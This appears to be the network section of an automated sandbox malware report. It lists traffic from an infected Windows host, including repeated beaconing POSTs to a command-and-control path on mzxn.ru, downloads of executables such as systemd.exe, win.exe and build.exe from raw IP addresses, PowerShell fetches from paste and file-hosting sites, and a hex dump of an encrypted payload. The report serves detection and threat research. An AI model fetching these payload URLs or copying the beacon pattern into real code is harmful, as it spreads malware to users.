Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nfdfhrsebwtpak.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 346Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nbjnvxjkhmqxikmf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 270Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://aqikanflflrl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 151Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xulyufyklyfdh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 271Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://foijjivakijcspuj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 115Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nbeolaysbixye.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 197Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lodrwjryqookcn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 159Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fbsckrfixku.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 150Host: mzxn.ru
Source: global traffic HTTP traffic detected: GET /systemd.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 77.221.157.163
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uafdxvcfkgfo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 150Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rbkrqeaeqwvdi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 349Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gbvtererkqfobu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 261Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://icugirctwrbhpuq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 301Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qnovtwajiclq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 303Host: mzxn.ru
Source: global traffic HTTP traffic detected: GET /win.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 64.190.113.113
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qrsqtwgtiasbuo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 309Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qgdbhmlcsptqb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 335Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ohroqjqgvdh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 169Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://swfkahecbiykwi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 336Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fbuadeoajebihl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 218Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lsufwulnegxqsvy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 354Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bluhmqewincunud.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 365Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://frvkldaekrdbt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 241Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mqumylcqnaa.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 301Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mqumylcqnaa.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 301Host: mzxn.ruData Raw: 3b 6e 22 17 f5 c8 6f 22 d7 de c2 70 0f 08 7c bd 7a 0d cb ed 19 06 93 15 0c 7a 7f 9d 37 b1 b5 63 e9 5f b5 2e 0f 6d 50 6a ec ea 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 51 2f c0 f6 6a 4a e3 af 9a 55 7e 8b ae af 81 de 0d 75 c2 f9 8a a3 aa 6d dc e7 a6 25 dd 44 59 76 78 0b 7b e2 5f f2 2d 1a 86 a2 c5 df bf d8 5f 32 c4 84 dc 5f ed 2e 93 50 80 1a 94 46 74 5b b9 1f 32 c2 0c 74 58 37 c8 4d bf f5 a2 be 99 cd 83 cf dc 33 88 96 b2 0f 64 80 3f 73 bb 8c 41 9d 13 5b 49 e5 f3 db fb dd a0 95 80 98 d0 7c 73 aa ba cb 59 e7 b7 cd 37 98 21 df ea 94 8a 8d ba bf 8e 2e 32 99 bf e0 29 74 98 8e ee 24 76 90 f2 1f d8 6f 5e 48 ee 10 e6 bb ba 2a e5 c2 55 08 1c e0 52 02 b9 b4 4c 8f 21 0c f7 eb a2 cb ec 72 b9 dc fc 53 fb 16 88 33 62 8f aa b3 24 d8 2e 11 ea 31 5b 68 9a 60 7e 81 89 d6 2e bc 20 bf 54 a5 f7 36 8c 75 31 10 11 47 81 b3 56 4f a2 d3 73 f1 f3 33 5a Data Ascii: ;n"o"p|zz7c_.mPj?#1|J7 M@NA -[k,vuQ/jJU~um%DYvx{_-_2_.PFt[2tX7M3d?sA[I|sY7!.2)t$vo^H*URL!rS3b$.1[h`~. T6u1GVOs3Z
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wvcpcwinaogm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 144Host: mzxn.ru
Source: global traffic HTTP traffic detected: GET /build.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 109.172.114.212
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qtgvwwvtuns.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 313Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nrlmldyquiidbru.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 286Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iidaiysfdtd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 330Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ggwxsequudqgaxcf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 323Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sqxnnumhnssm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 349Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ctqgxbikusofytgf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 148Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dbybeunkxlc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 121Host: mzxn.ru
Source: unknown TCP traffic detected without corresponding DNS query: 77.221.157.163
Source: unknown TCP traffic detected without corresponding DNS query: 77.221.157.163
Source: unknown TCP traffic detected without corresponding DNS query: 77.221.157.163
Source: unknown TCP traffic detected without corresponding DNS query: 77.221.157.163
Source: unknown TCP traffic detected without corresponding DNS query: 77.221.157.163
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: global traffic HTTP traffic detected: GET /wp-content/images/pic1.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: mussangroup.com
Source: global traffic HTTP traffic detected: GET /setups.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: funrecipebooks.com
Source: global traffic HTTP traffic detected: GET /microgods/raw HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-CH) WindowsPowerShell/5.1.19041.1682Host: rentry.coConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download/direct/6b24ec97-2a8d-468d-a24d-c8081cda1dab/vm.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: store4.gofile.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: store4.gofile.io
Source: global traffic HTTP traffic detected: GET /systemd.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 77.221.157.163
Source: global traffic HTTP traffic detected: GET /win.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 64.190.113.113
Source: global traffic HTTP traffic detected: GET /build.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 109.172.114.212
Source: global traffic DNS traffic detected: DNS query: mzxn.ru
Source: global traffic DNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa
Source: global traffic DNS traffic detected: DNS query: mussangroup.com
Source: global traffic DNS traffic detected: DNS query: funrecipebooks.com
